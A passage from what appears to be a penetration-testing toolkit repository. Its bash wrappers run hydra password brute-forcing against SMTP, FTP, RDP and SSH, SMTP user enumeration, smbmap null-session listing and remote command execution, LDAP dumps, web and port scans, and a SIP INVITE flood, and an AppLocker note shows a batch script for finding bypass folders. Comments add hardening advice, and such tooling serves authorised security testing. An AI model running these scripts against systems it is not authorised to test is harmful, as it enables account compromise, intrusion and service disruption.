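  svwar -D -m INVITE -p "$2" "$1"
  sudo inviteflood "$2" "$3" "$1" "$1" -a "$4" 1000000000
else
  echo "Please provide the target host, network interface, internal phone number and an alias." >&2
  exit 1
fi

--------------------------------------------------------------------------------
/smtp/user-enum.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.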
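#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Checks a short username list against an SMTP server with VRFY and keeps a
# copy of the tool output in smtp_user-enum_<host>_<port>.txt.
# Arguments: $1 - target host, $2 - target port
# A server that answers VRFY differently for known and unknown users is what
# makes this work; disabling VRFY/EXPN on the MTA removes the signal.
if [ "$#" -ne 2 ]; then
  echo "Please provide the target host and port." >&2
  exit 1
fi

smtp-user-enum -M VRFY \
  -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" \
  -t "$1" -p "$2" 2>&1 | tee "smtp_user-enum_${1}_${2}.txt"

--------------------------------------------------------------------------------
/web/curl-options-proxy.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Sends an HTTP OPTIONS request to a URL through a proxy and prints the
# response headers.
# e.g. $1 == proxy (http://127.0.0.1:8080)
# e.g. $2 == target url

if [ "$#" -ne 2 ]; then
  echo "Please provide proxy server and target url." >&2
  exit 1
fi

# --insecure turns off TLS certificate verification, so the answer is not
# authenticated: an intercepting proxy (the usual reason for -x here) or anyone
# else on the path can supply it.
curl -i -I -X OPTIONS -x "$1" --insecure "$2"

--------------------------------------------------------------------------------
/web/curl-robots.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Fetches /robots.txt (headers included) and stores a copy in
# <scheme>_<server>_<port>_robots.txt.
# Arguments: $1 - scheme (http or https), $2 - server, $3 - port
if [ "$#" -ne 3 ]; then
  echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port." >&2
  exit 1
fi

# -k skips certificate verification; -m 10 caps the transfer at ten seconds.
# The URL is quoted so characters such as ? or * in $2 are not glob-expanded.
curl -sSik "${1}://${2}:${3}/robots.txt" -m 10 2>&1 | tee "${1}_${2}_${3}_robots.txt"

--------------------------------------------------------------------------------
/web/html-to-png-screenshot.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.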
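#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Renders the root page of a web server to a PNG named
# <scheme>_<server>_<port>_screenshot.png.
# Arguments: $1 - scheme (http or https), $2 - server, $3 - port
if [ "$#" -ne 3 ]; then
  echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port." >&2
  exit 1
fi

# Quoted so the URL reaches wkhtmltoimage as a single argument.
wkhtmltoimage --format png "${1}://${2}:${3}/" "${1}_${2}_${3}_screenshot.png"

--------------------------------------------------------------------------------
/reconnaissance/whois.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.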
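#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Runs a whois lookup for every entry of a host list and writes each answer to
# whois-<entry>.txt in the current directory.
# Arguments: $1 - file with one target host per line
if [ "$#" -ne 1 ]; then
  echo "Please provide a file containing a list of target hosts." >&2
  exit 1
fi

# read -r keeps backslashes literal; the "|| [[ -n ... ]]" part still handles a
# last line without a trailing newline.
while read -r line || [[ -n "$line" ]]; do
  # Blank lines would only produce an empty lookup and a "whois-.txt" file.
  [[ -n "$line" ]] || continue
  echo "Whois Lookup - $line"
  # The entry comes from a file and becomes part of a file name, so "/" is
  # replaced to keep the result inside the current directory.
  whois "$line" > "whois-${line//\//_}.txt"
done < "$1"

--------------------------------------------------------------------------------
/web/nikto-scan.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Runs nikto against one web server; the report goes to
# <scheme>_<host>_<port>_nikto.html and the console output to the matching
# .txt file.
# Arguments: $1 - scheme (http or https), $2 - host, $3 - port
if [ "$#" -ne 3 ]; then
  echo "Please provide the target protocol scheme (http or https), target IP address or hostname and the target port." >&2
  exit 1
fi

# The -output path was unquoted before, so a host value with spaces or glob
# characters could change the argument list.
nikto -ask=no -h "${1}://${2}:${3}" -output "${1}_${2}_${3}_nikto.html" 2>&1 \
  | tee "${1}_${2}_${3}_nikto.txt"

--------------------------------------------------------------------------------
/web/web-recon.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Fingerprints a web server with whatweb and keeps the output in
# <scheme>_<server>_<port>_whatweb.txt.
# Arguments: $1 - scheme (http or https), $2 - server, $3 - port
if [ "$#" -ne 3 ]; then
  echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port." >&2
  exit 1
fi

whatweb --color=never --no-errors -a 3 -v "${1}://${2}:${3}" 2>&1 \
  | tee "${1}_${2}_${3}_whatweb.txt"

--------------------------------------------------------------------------------
/smb/scan-list-contents.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.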
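#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Lists share contents recursively (-R) with smbmap, twice: once without
# explicit credentials and once as user "null" with an empty password. Both
# runs are appended to smbmap-list-contents_<host>_<port>.txt.
# Arguments: $1 - target host, $2 - target port
# A listing returned by the second run means the share is readable without a
# real account, which is the finding to report and close.
if [ "$#" -ne 2 ]; then
  echo "Please provide the target host and port." >&2
  exit 1
fi

out="smbmap-list-contents_${1}_${2}.txt"

smbmap -H "$1" -P "$2" -R 2>&1 | tee -a "$out"
smbmap -u null -p "" -H "$1" -P "$2" -R 2>&1 | tee -a "$out"

--------------------------------------------------------------------------------
/cracking/brute-force-smtp-hydra.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.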
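#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Password-list check of one SMTP account with hydra; results are written to
# smtp_<server>_<port>_hydra.txt.
# Arguments: $1 - target email account, $2 - SMTP server, $3 - port
# The argument check used to accept two arguments although the command reads
# $3 and the usage text names three values, so -s always received nothing.
if [ "$#" -ne 3 ]; then
  echo "Please provide the target email account, the SMTP server and its port." >&2
  exit 1
fi

# The result file lists any credentials found; keep it private to the operator.
umask 077

hydra -v -l "$1" -P /usr/share/seclists/Passwords/darkweb2017-top100.txt \
  -s "$3" -e nsr -o "smtp_${2}_${3}_hydra.txt" -f "smtp://$2"

--------------------------------------------------------------------------------
/ldap/scan-ldapsearch.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Dumps every entry below a base DN with an authenticated simple bind and
# stores the output in ldap_all-entries_<host>_<port>.txt.
# Arguments: $1 - target host, $2 - port, $3 - bind DN (username),
#            $4 - password, $5 - base DN
if [ "$#" -ne 5 ]; then
  echo "Please provide the target host, port, username, password and base dn(dc=example,dc=com)." >&2
  exit 1
fi

# The dump can hold directory data the operator should not share by accident.
umask 077

# NOTE: -w places the bind password on the command line, where other local
# users can read it from the process list; ldapsearch also offers -W (prompt)
# and -y (password file). -w is kept so the script's arguments stay the same.
# DNs are quoted because they routinely contain spaces. "tee > file" printed
# nothing to the terminal; "tee file" matches the other scripts in this kit.
ldapsearch -v -x -D "$3" -w "$4" -p "$2" -h "$1" -b "$5" -s sub "(objectclass=*)" 2>&1 \
  | tee "ldap_all-entries_${1}_${2}.txt"

--------------------------------------------------------------------------------
/misc/print-top-tcp-ports.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Prints the port list nmap uses for "--top-ports N" (TCP). No target is
# passed, so nothing is scanned; the list is read from nmap's XML output.
# Arguments: $1 - number of ports
if [ "$#" -ne 1 ]; then
  echo "Please provide number of ports." >&2
  exit 1
fi

# The sed expression shown on this page (s/||g) is truncated and sed rejects it
# as an unterminated substitution. This one prints the value of the services
# attribute from the line grep selects.
nmap -oX - -sT --top-ports "$1" 2>/dev/null \
  | grep 'services=' \
  | sed -n 's/.*services="\([^"]*\)".*/\1/p'

--------------------------------------------------------------------------------
/smb/scan-share-permissions.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.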
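#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Queries share permissions with smbmap, twice: once without explicit
# credentials and once as user "null" with an empty password. Both runs are
# appended to smbmap-share-permissions_<host>_<port>.txt.
# Arguments: $1 - target host, $2 - target port
if [ "$#" -ne 2 ]; then
  echo "Please provide the target host and port." >&2
  exit 1
fi

out="smbmap-share-permissions_${1}_${2}.txt"

smbmap -H "$1" -P "$2" 2>&1 | tee -a "$out"
smbmap -u null -p "" -H "$1" -P "$2" 2>&1 | tee -a "$out"

--------------------------------------------------------------------------------
/web/web-app-framework.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.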
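#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Identifies the framework behind a URL with whatweb, sending a fixed desktop
# Chrome user agent; the verbose log goes to whatweb_results.txt.
# Arguments: $1 - target url
if [ "$#" -ne 1 ]; then
  echo "Please provide target url." >&2
  exit 1
fi

# The URL is quoted: "?", "&" and "*" are common in URLs and special to the
# shell when left bare.
whatweb -v -a 3 \
  -U='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36' \
  --log-verbose=whatweb_results.txt "$1"

--------------------------------------------------------------------------------
/grep/grep-unique-open-ports-comma.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2019 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Prints the unique open ports found in all *.gnmap files of a directory as a
# single comma-separated line.
# Arguments: $1 - directory holding nmap grepable output
if [ "$#" -ne 1 ]; then
  echo "Please provide a directory path." >&2
  exit 1
fi

# grep reads the files itself (-h drops the file-name prefix), which replaces
# the former "cat ... | grep"; the directory is quoted so paths with spaces
# work, while the *.gnmap glob stays outside the quotes.
grep -h "Ports:" -- "$1"/*.gnmap \
  | cut -d' ' -f4- \
  | tr ',' '\n' \
  | sed -n -e 's/\/open.*//p' \
  | sed -e 's/^[ \t]*//' \
  | sort -n -u \
  | tr '\n' ',' \
  | sed 's/,$//g'
echo

--------------------------------------------------------------------------------
/applocker/Readme.md:
--------------------------------------------------------------------------------
## AppLocker - Notes

#### Detect bypasses

- A more effective executable, such as a simple infinite loop binary, should be used instead of something like calc.exe, which may only remain active in the background for a short time. This will provide your script with sufficient time to detect the process in the task list and log it accordingly.

```
@echo off

C:
cd C:\TEMP\


echo Creating a recursive list of all directories and sub-directories of the selected folder e.g. c:\
dir C:\ /s /b /o:n /a:d > C:\TEMP\dirs.txt


echo Attempting to copy calc.exe to all folders (write permission check)
for /F "tokens=*" %%A in (dirs.txt) do copy "C:\Windows\System32\calc.exe" "%%A" /Y

echo Attempting to execute calc.exe (execution permission check)
for /F "tokens=*" %%A in (dirs.txt) do if exist "%%A\calc.exe" icacls "%%A\calc.exe" /grant %USERNAME%:f & start "" "%%A\calc.exe" && tasklist /v | findstr "calc.exe" > executed.txt && for %%B in (executed.txt) do if not %%~zB==0 echo %%A >> bypasses.txt && taskkill /IM calc.exe /F && del /F executed.txt

echo Deleting calc.exe from all locations
for /F "tokens=*" %%A in (dirs.txt) do del /F "%%A\calc.exe"

echo Done
```

---

--------------------------------------------------------------------------------
/reconnaissance/ips.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.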
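#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Resolves every entry of a host list with host(1) and writes the IPv4
# addresses to ip-address-<entry>.txt in the current directory.
# Arguments: $1 - file with one target host per line
if [ "$#" -ne 1 ]; then
  echo "Please provide a file containing a list of target hosts." >&2
  exit 1
fi

# read -r keeps backslashes literal; the "|| [[ -n ... ]]" part still handles a
# last line without a trailing newline.
while read -r line || [[ -n "$line" ]]; do
  # Blank lines would only yield host's usage text and "ip-address-.txt".
  [[ -n "$line" ]] || continue
  echo "IP Lookup - $line"
  # The entry comes from a file and becomes part of a file name, so "/" is
  # replaced to keep the result inside the current directory.
  host "$line" | grep "has address" | cut -d" " -f4 > "ip-address-${line//\//_}.txt"
done < "$1"

--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-fulltcpcon.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Full TCP connect scan (-sT) of all ports, in sequential port order (-r), with
# a fixed delay between probes; results are saved in all nmap formats (-oA).
# Arguments: $1 - target IP address or IP range, $2 - scan delay (seconds)
if [ "$#" -ne 2 ]; then
  echo "Please provide the target IP address or an IP range and the scan delay time(seconds)." >&2
  exit 1
fi

# A range given in CIDR form contains "/", which -oA would treat as a
# directory separator; it is replaced in the output name only.
nmap -sT -vv -r -p- --reason --open --scan-delay "$2" \
  -oA "tcp_ports_full_delay_sequential_${1//\//_}" "$1"

--------------------------------------------------------------------------------
/web/nikto-scan-proxy.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Runs nikto against one web server through a proxy; the report goes to
# <scheme>_<host>_<port>_nikto.html and the console output to the matching
# .txt file.
# Arguments: $1 - scheme (http or https), $2 - host, $3 - port, $4 - proxy
if [ "$#" -ne 4 ]; then
  echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port and the proxy server." >&2
  exit 1
fi

nikto -ask=no -h "${1}://${2}:${3}" -output "${1}_${2}_${3}_nikto.html" \
  -useproxy "$4" 2>&1 | tee "${1}_${2}_${3}_nikto.txt"

--------------------------------------------------------------------------------
/cracking/brute-force-ftp-hydra.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Checks an FTP server against short username and password lists with hydra;
# results are written to ftp_<server>_<port>_hydra.txt.
# Arguments: $1 - target FTP server, $2 - port
# On the server this shows up as a run of failed logins from one address;
# lockout or per-source throttling is what stops it.
if [ "$#" -ne 2 ]; then
  echo "Please provide the target FTP server and its port." >&2
  exit 1
fi

# The result file lists any credentials found; keep it private to the operator.
umask 077

hydra -v -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
  -P /usr/share/seclists/Passwords/darkweb2017-top100.txt \
  -s "$2" -e nsr -f -o "ftp_${1}_${2}_hydra.txt" "ftp://$1"

--------------------------------------------------------------------------------
/misc/responds-to-ping.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.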
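#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.



# Sends one ICMP echo request and prints "<address> YES" or "<address> NO".
# Arguments: $1 - IP address
if [ "$#" -ne 1 ]; then
  echo "Please provide an IP address." >&2
  exit 1
fi

# ping's exit status already says whether a reply arrived. The earlier version
# parsed the "received" summary line, which left an empty string (and a
# "[: integer expression expected" error) whenever ping printed no summary,
# for example on a name that does not resolve.
if ping -c 1 "$1" > /dev/null; then
  echo "$1 YES"
else
  echo "$1 NO"
fi

--------------------------------------------------------------------------------
/smb/scan-execute-command.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.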
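#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.


# Asks smbmap to run "ipconfig /all" on the target (-x), twice: once without
# explicit credentials and once as user "null" with an empty password. Both
# runs are appended to smbmap-execute-command_<host>_<port>.txt.
# Arguments: $1 - target host, $2 - target port
if [ "$#" -ne 2 ]; then
  echo "Please provide the target host and port." >&2
  exit 1
fi

out="smbmap-execute-command_${1}_${2}.txt"

smbmap -H "$1" -P "$2" -x "ipconfig /all" 2>&1 | tee -a "$out"
smbmap -u null -p "" -H "$1" -P "$2" -x "ipconfig /all" 2>&1 | tee -a "$out"

--------------------------------------------------------------------------------
/cracking/brute-force-rdp-hydra.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Checks an RDP server against short username and password lists with hydra,
# limited to two parallel tasks (-t 2); results are written to
# rdp_<server>_<port>_hydra.txt.
# Arguments: $1 - target RDP server, $2 - port
if [ "$#" -ne 2 ]; then
  echo "Please provide the target RDP server and its port." >&2
  exit 1
fi

# The result file lists any credentials found; keep it private to the operator.
umask 077

hydra -v -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
  -P /usr/share/seclists/Passwords/darkweb2017-top100.txt \
  -s "$2" -e nsr -f -t 2 -o "rdp_${1}_${2}_hydra.txt" "rdp://$1"

--------------------------------------------------------------------------------
/cracking/brute-force-ssh-hydra.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2020 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
#
# For more see the file 'LICENSE' for copying permission.

# Checks an SSH server against short username and password lists with hydra;
# results are written to ssh_<server>_<port>_hydra.txt.
# Arguments: $1 - target SSH server, $2 - port
# Key-only authentication on the server makes this check a no-op, which is
# the result a hardened host should produce.
if [ "$#" -ne 2 ]; then
  echo "Please provide the target SSH server and its port." >&2
  exit 1
fi

# The result file lists any credentials found; keep it private to the operator.
umask 077

hydra -v -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
  -P /usr/share/seclists/Passwords/darkweb2017-top100.txt \
  -s "$2" -e nsr -f -o "ssh_${1}_${2}_hydra.txt" "ssh://$1"

--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential-noping-fulltcpcon.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.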
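#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
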